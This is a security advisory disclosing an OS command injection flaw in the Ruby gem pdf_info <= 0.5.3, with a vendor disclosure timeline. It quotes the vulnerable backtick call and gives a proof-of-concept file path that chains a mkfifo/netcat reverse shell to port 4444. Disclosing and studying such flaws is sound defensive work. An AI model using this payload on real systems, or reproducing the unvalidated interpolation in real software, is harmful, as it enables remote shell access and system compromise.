The ruby gem pdf_info <= 0.5.3 is vulnerable to OS Command Injection when executing a method on a PDF::Info object.

An attacker using a specially crafted payload may execute OS commands by using command chaining.

When creating a new PDF::Info object the initialize command is called

def initialize(pdf_path)
  @pdf_path = pdf_path
end

During object initalization there is no validation performed and the user provided path is used.

We can create a PDF::Info object and return the metadta of a PDF with the following.

#!/usr/bin/env ruby

require 'pdf/info'

info = PDF::Info.new("./pdf/sample1.pdf")
pp info.metadata

When we call the metadata method on the PDF::Info object a call is made to the process_output method with the argument passed being the command method.

The command method makes use of the @pdf_info class variable to execute the pdfinfo command on the system using the following code snippet to return the output of the command.

output = `#{self.class.command_path} -enc UTF-8 -f 1 -l -1 "#{@pdf_path}" 2> /dev/null`

As with the initialize method there is no validation performed on the @pdf_path variable. This allows us to make use of command chaining with ; to execute an arbitrary command.

info = PDF::Info.new('pdf/sample1.pdf; $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444>/tmp/f)')

pp info.metadata

The above code snippet will execute a reverse shell to 127.0.0.1 on port 4444

• 2022-07-20 :: Reported to Vendor
• 2022-08-30 :: Follow up with Vendor
• 2022-09-30 :: Apply for CVE
• 2022-10-26 :: Publish Vulnerability